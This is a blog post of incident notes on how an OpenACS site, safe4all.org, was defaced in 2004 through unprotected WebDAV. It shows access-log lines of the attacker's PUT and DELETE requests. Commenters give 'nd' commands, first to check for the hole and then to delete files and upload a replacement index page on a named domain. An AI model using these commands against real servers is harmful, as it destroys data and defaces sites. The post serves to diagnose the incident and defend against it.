Blog‎ > ‎

Notes on Getting Owned

posted Dec 19, 2008, 4:07 PM by Jade Rubick
These are some notes on getting hacked. They show how the safe4all.org server got hacked. Here's the vulnerability they exploited: http://openacs.org/forums/message-view?message_id=195894


safe4all.log.2004-07-27-00:00:200.153.243.141 - - [26/Jul/2004:07:22:26 -0700] "PUT /hbr.htm HTTP/1.0" 201 275 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -
safe4all.log.2004-07-27-00:00:200.153.243.141 - - [26/Jul/2004:07:22:26 -0700] "PUT /hbr.htm HTTP/1.0" 201 275 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -

safe4all.log.2004-07-31-00:00:213.219.122.11 - - [30/Jul/2004:10:55:24 -0700] "GET /hbr.htm HTTP/1.0" 200 15 "" "Wget/1.9.1" -

safe4all.log.2004-07-31-00:00:164.71.2.5 - - [30/Jul/2004:10:56:19 -0700] "GET /hbr.htm HTTP/1.0" 200 15 "" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" -

safe4all.log.2004-07-31-00:00:207.46.98.60 - - [30/Jul/2004:13:56:21 -0700] "GET /hbr.htm HTTP/1.0" 200 15 "" "msnbot/0.11 (+http://search.msn.com/msnbot.htm)" -

safe4all.log.2004-08-02-00:00:164.71.2.5 - - [01/Aug/2004:04:28:33 -0700] "GET /hbr.htm HTTP/1.0" 200 15 "" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" -

safe4all.log.2004-08-02-00:00:82.135.2.64 - - [01/Aug/2004:10:20:52 -0700] "GET /hbr.htm HTTP/1.1" 200 15 "http://www.zone-h.org/defacements/filter/filter_defacer=H4ck3rsBr" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" -

safe4all.log.2004-08-03-00:00:200.153.243.109 - - [02/Aug/2004:09:32:34 -0700] "PUT /hbr.htm HTTP/1.0" 204 0 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -

On http://www.zone-h.org/en/defacements/filter/filter_defacer=Hack3rz/ you can see all the defacements from this particular hackers:

2004/08/01 H4ck3rsBR M safe4all.org/hbr.htm Linux

The initial file: hbr.htm:

H4ck3rsBr Ownz You System...

Rehacked on the 15th:

2004/08/15 Hack3rz H R safe4all.org

A bunch of clueless people trying to figure out what happened:
http://www.parcom.net/forum/topic.asp?TOPIC_ID=1732

Looks like they've broken into PHP Nuke too: http://www.phidelity.com/cms/modules.php?name=News&file=article&sid=30

They claim they don't leave any trojans:
http://mirror.delta5.com.br/2004/07/31/mail.buerger.passau.de/


safe4all.log.2004-07-18-00:00:200.158.9.169 - - [17/Jul/2004:16:08:24 -0700] "PUT /fusion.htm HTTP/1.0" 404 547 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -
safe4all.log.2004-07-19-00:00:200.158.8.201 - - [18/Jul/2004:19:46:49 -0700] "PUT /h4ck3rsbr.htm HTTP/1.0" 404 547 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -
safe4all.log.2004-07-24-00:00:200.162.208.250 - - [23/Jul/2004:04:55:27 -0700] "PUT /www.arplhmd.cjb.net_064133 HTTP/1.0" 201 294 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -
safe4all.log.2004-07-24-00:00:200.162.208.250 - - [23/Jul/2004:04:55:27 -0700] "PUT /www.arplhmd.cjb.net_064133 HTTP/1.0" 204 0 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -
safe4all.log.2004-07-27-00:00:200.153.243.141 - - [26/Jul/2004:07:22:26 -0700] "PUT /hbr.htm HTTP/1.0" 201 275 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -
safe4all.log.2004-08-03-00:00:200.153.243.109 - - [02/Aug/2004:09:32:34 -0700] "PUT /hbr.htm HTTP/1.0" 204 0 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -
safe4all.log.2004-08-15-00:00:200.140.36.237 - - [14/Aug/2004:13:56:28 -0700] "PUT /www.arplhmd.cjb.net_175955 HTTP/1.0" 201 294 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -
safe4all.log.2004-08-15-00:00:200.140.36.237 - - [14/Aug/2004:15:00:55 -0700] "PUT /index.html HTTP/1.0" 201 278 "" "Microsoft Data Access Internet Publishing Provider DAV" "ad_session_id=3614167%2c0%2c0+%7b313+1092521929+AFE1A1CE4C39886DB8352FB52167F1F92CE039EA%7d"
safe4all.log.2004-08-15-00:00:200.140.36.237 - - [14/Aug/2004:15:05:14 -0700] "PUT /default.htm HTTP/1.0" 201 279 "" "Microsoft Data Access Internet Publishing Provider DAV" "ad_session_id=3614167%2c0%2c0+%7b313+1092521929+AFE1A1CE4C39886DB8352FB52167F1F92CE039EA%7d"
safe4all.log.2004-08-15-00:00:200.140.36.237 - - [14/Aug/2004:15:05:23 -0700] "PUT /default.html HTTP/1.0" 201 280 "" "Microsoft Data Access Internet Publishing Provider DAV" "ad_session_id=3614167%2c0%2c0+%7b313+1092521929+AFE1A1CE4C39886DB8352FB52167F1F92CE039EA%7d"
safe4all.log.2004-08-15-00:00:200.140.36.237 - - [14/Aug/2004:15:05:33 -0700] "PUT /home.htm HTTP/1.0" 201 276 "" "Microsoft Data Access Internet Publishing Provider DAV" "ad_session_id=3614167%2c0%2c0+%7b313+1092521929+AFE1A1CE4C39886DB8352FB52167F1F92CE039EA%7d"
safe4all.log.2004-08-15-00:00:200.140.36.237 - - [14/Aug/2004:15:06:15 -0700] "PUT /index.htm HTTP/1.0" 201 277 "" "Microsoft Data Access Internet Publishing Provider DAV" "ad_session_id=3614167%2c0%2c0+%7b313+1092521929+AFE1A1CE4C39886DB8352FB52167F1F92CE039EA%7d"
safe4all.log.2004-08-15-00:00:200.101.38.143 - - [14/Aug/2004:16:49:45 -0700] "PUT /www.arplhmd.cjb.net_205434 HTTP/1.0" 201 294 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -
safe4all.log.2004-08-15-00:00:200.101.38.143 - - [14/Aug/2004:17:17:33 -0700] "PUT /www.arplhmd.cjb.net_205434 HTTP/1.0" 204 0 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -



safe4all.log.2004-08-15-00:00:200.140.36.237 - - [14/Aug/2004:14:59:40 -0700] "DELETE /index.html HTTP/1.0" 204 0 "" "Microsoft Data Access Internet Publishing Provider DAV" "ad_session_id=3614167%2c0%2c0+%7b313+1092521929+AFE1A1CE4C39886DB8352FB52167F1F92CE039EA%7d"
safe4all.log.2004-08-15-00:00:200.140.36.237 - - [14/Aug/2004:14:59:45 -0700] "DELETE /index.tcl HTTP/1.0" 204 0 "" "Microsoft Data Access Internet Publishing Provider DAV" "ad_session_id=3614167%2c0%2c0+%7b313+1092521929+AFE1A1CE4C39886DB8352FB52167F1F92CE039EA%7d"

safe4all.log.2004-08-15-00:00:200.140.36.237 - - [14/Aug/2004:14:59:49 -0700] "DELETE /index.xql HTTP/1.0" 204 0 "" "Microsoft Data Access Internet Publishing Provider DAV" "ad_session_id=3614167%2c0%2c0+%7b313+1092521929+AFE1A1CE4C39886DB8352FB52167F1F92CE039EA%7d"
safe4all.log.2004-08-15-00:00:200.140.36.237 - - [14/Aug/2004:14:59:57 -0700] "DELETE /index.adp HTTP/1.0" 204 0 "" "Microsoft Data Access Internet Publishing Provider DAV" "ad_session_id=3614167%2c0%2c0+%7b313+1092521929+AFE1A1CE4C39886DB8352FB52167F1F92CE039EA%7d"
safe4all.log.2004-08-15-00:00:200.140.36.237 - - [14/Aug/2004:15:00:20 -0700] "HEAD /index.html HTTP/1.0" 200 0 "" "Microsoft Data Access Internet Publishing Provider DAV" "ad_session_id=3614167%2c0%2c0+%7b313+1092521929+AFE1A1CE4C39886DB8352FB52167F1F92CE039EA%7d"



82.96.96.3 - - [14/Aug/2004:20:48:58 -0700] "CONNECT 82.96.96.3:802 HTTP/1.0" 404 547 "" "" -
82.96.96.3 - - [14/Aug/2004:20:48:59 -0700] "POST http://82.96.96.3:802/ HTTP/1.0" 500 540 "" "" -
82.96.96.3 - - [14/Aug/2004:20:48:59 -0700] "CONNECT 82.96.96.3:802 HTTP/1.0" 404 547 "" "" -
82.96.96.3 - - [14/Aug/2004:20:48:59 -0700] "POST http://82.96.96.3:802/ HTTP/1.0" 500 540 "" "" -


IP addresses:

200.158.8.201
200.162.208.250
200.153.243.141
200.140.36.237
200.101.38.143
82.96.96.3


Comments:

How to check that your site is vulnerable

matthewg another way is to install nd (apt-get install nd) then do this: matthewg nd -v http://www.safe4all.org/* matthewg If it gives a listing of your files then you haven't fixed it.

by Jade Rubick on 08/16/04

more notes from matthewg and aegrumet

Then i can simply start deleting things like this: # nd -d http://www.thedesignexperience.org/test.adp~ # nd -d http://www.thedesignexperience.org/index-old.adp # nd -d http://www.thedesignexperience.org/index-old.tcl etc. Then i can upload a new index.html by doing this: # nd -p ~/nasty-index.html -T application/x-www-form-urlencode http://www.thedesignexperience.org/index.html ah, in case anyone cares if you don't have the tdav sections configured in the config.tcl then no filters are applied see packages/oacs-dav/tcl/tDAV-procs.tcl

by Jade Rubick on 08/16/04

freenode.net

Regarding: > 82.96.96.3 - - [14/Aug/2004:20:48:58 -0700] "CONNECT 82.96.96.3:802 HTTP/1.0" That's proxy-testing from freenode.net and triggered by somebody at your location using IRC. You can either tell that person - and maybe everybody else there too? - to stop using IRC, or contact freenode.net and they'll block connections. Freenode might claim that they can do this proxy-detection because your user agreed their EULA. I didn't see the logic in that - since most end-users can't speak on behalf of the server owners - but that's another story... :) Anyway, in short, the above item appearing in a web server log is not somebody trying to hack. freenode.net's policy page has more info.

by Adam Koch on 04/28/05

Comments